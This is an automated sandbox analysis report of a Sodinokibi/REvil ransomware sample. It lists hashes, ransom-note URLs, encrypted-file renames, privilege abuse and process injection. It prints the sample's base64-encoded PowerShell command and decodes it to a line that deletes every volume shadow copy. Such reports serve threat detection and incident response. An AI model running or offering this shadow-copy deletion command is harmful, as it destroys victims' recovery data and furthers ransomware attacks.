Analysis
- max time kernel: 119s
- max time network: 145s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 24-01-2022 00:55
Static task: static1
Behavioral task: behavioral1
- Sample: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
- Resource: win10-en-20211208
General
- Target: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
- Size: 114KB
- MD5: 7aa014e2800e080f3d14737599d21cf9
- SHA1: 62ae49505dad5b24f8fbc8b78fd73da18c55a068
- SHA256: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be
- SHA512: b71067909b78c018d17ef39ca21247cbc901e2635bb2394164ae9d97e35bf25021f922f3c2fa0e951f50c601ba136982f048640c76ea57d861e7d7c4f96a61f3
Malware Config
Extracted from: C:\95v25c3-readme.txt
- Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2644A3314CA96A2
- http://decryptor.cc/D2644A3314CA96A2
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Modifies extensions of user files (6 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (process for every row: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe):
  - File renamed: C:\Users\Admin\Pictures\ConvertFromStop.raw => \??\c:\users\admin\pictures\ConvertFromStop.raw.95v25c3
  - File renamed: C:\Users\Admin\Pictures\InitializeProtect.crw => \??\c:\users\admin\pictures\InitializeProtect.crw.95v25c3
  - File renamed: C:\Users\Admin\Pictures\InstallDisconnect.raw => \??\c:\users\admin\pictures\InstallDisconnect.raw.95v25c3
  - File renamed: C:\Users\Admin\Pictures\RequestDisable.tif => \??\c:\users\admin\pictures\RequestDisable.tif.95v25c3
  - File renamed: C:\Users\Admin\Pictures\SearchGrant.tif => \??\c:\users\admin\pictures\SearchGrant.tif.95v25c3
  - File renamed: C:\Users\Admin\Pictures\SendComplete.png => \??\c:\users\admin\pictures\SendComplete.png.95v25c3
- Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes (process for every row: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe):
  - File opened (read-only): \??\G:, \??\H:, \??\L:, \??\N:, \??\O:, \??\F:, \??\J:, \??\U:, \??\V:, \??\E:, \??\I:, \??\M:, \??\P:, \??\R:, \??\S:, \??\X:, \??\Y:, \??\D:, \??\A:, \??\B:, \??\K:, \??\Q:, \??\T:, \??\W:, \??\Z:
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes (process: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe):
  - Set value (str): \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fhm75.bmp"
- Drops file in Program Files directory (19 IoCs)
  Processes (process for every row: d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe):
  - File opened for modification: \??\c:\program files\RedoUndo.asp
  - File opened for modification: \??\c:\program files\UnlockWrite.TTS
  - File created: \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\95v25c3-readme.txt
  - File opened for modification: \??\c:\program files\ConvertToSuspend.css
  - File opened for modification: \??\c:\program files\MountUpdate.kix
  - File opened for modification: \??\c:\program files\RequestRestart.001
  - File opened for modification: \??\c:\program files\TraceDisconnect.aiff
  - File created: \??\c:\program files (x86)\microsoft sql server compact edition\95v25c3-readme.txt
  - File opened for modification: \??\c:\program files\InvokeConnect.vst
  - File opened for modification: \??\c:\program files\OpenExport.3gpp
  - File opened for modification: \??\c:\program files\PublishTrace.fon
  - File created: \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\95v25c3-readme.txt
  - File created: \??\c:\program files (x86)\95v25c3-readme.txt
  - File opened for modification: \??\c:\program files\ClearSwitch.sql
  - File opened for modification: \??\c:\program files\DebugDeny.ttc
  - File opened for modification: \??\c:\program files\ResolveUnlock.dwg
  - File opened for modification: \??\c:\program files\SendJoin.odt
  - File opened for modification: \??\c:\program files\TraceEdit.mpeg2
  - File created: \??\c:\program files\95v25c3-readme.txt
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid, process):
  - 1796 d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
  - 672 powershell.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, 1796, d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
  - Token: SeDebugPrivilege, 672, powershell.exe
  - Token: SeBackupPrivilege, 1300, vssvc.exe
  - Token: SeRestorePrivilege, 1300, vssvc.exe
  - Token: SeAuditPrivilege, 1300, vssvc.exe
  - Token: SeTakeOwnershipPrivilege, 1796, d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes (description, pid, process, target process); the same row is recorded four times:
  - PID 1796 wrote to memory of 672, 1796, d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe, powershell.exe
  - PID 1796 wrote to memory of 672, 1796, d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe, powershell.exe
  - PID 1796 wrote to memory of 672, 1796, d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe, powershell.exe
  - PID 1796 wrote to memory of 672, 1796, d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe, powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe"
  - Modifies extensions of user files
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1796
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, child of PID 1796)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , which accounts for the vssvc.exe activity below)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 672
- C:\Windows\system32\wbem\unsecapp.exe (level 1)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 588
- C:\Windows\system32\vssvc.exe (level 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 1300
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/672-55-0x000007FEFC321000-0x000007FEFC323000-memory.dmp (Filesize: 8KB)
- memory/672-56-0x000007FEF35B0000-0x000007FEF410D000-memory.dmp (Filesize: 11.4MB)
- memory/672-57-0x0000000002460000-0x0000000002462000-memory.dmp (Filesize: 8KB)
- memory/672-58-0x0000000002462000-0x0000000002464000-memory.dmp (Filesize: 8KB)
- memory/672-59-0x0000000002464000-0x0000000002467000-memory.dmp (Filesize: 12KB)
- memory/672-60-0x000000001B740000-0x000000001BA3F000-memory.dmp (Filesize: 3.0MB)
- memory/672-61-0x000000000246B000-0x000000000248A000-memory.dmp (Filesize: 124KB)
- memory/1796-54-0x0000000076C61000-0x0000000076C63000-memory.dmp (Filesize: 8KB)